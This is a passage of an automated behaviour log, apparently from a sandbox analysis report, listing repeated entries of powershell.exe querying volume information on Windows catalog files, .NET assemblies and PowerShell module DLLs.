Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
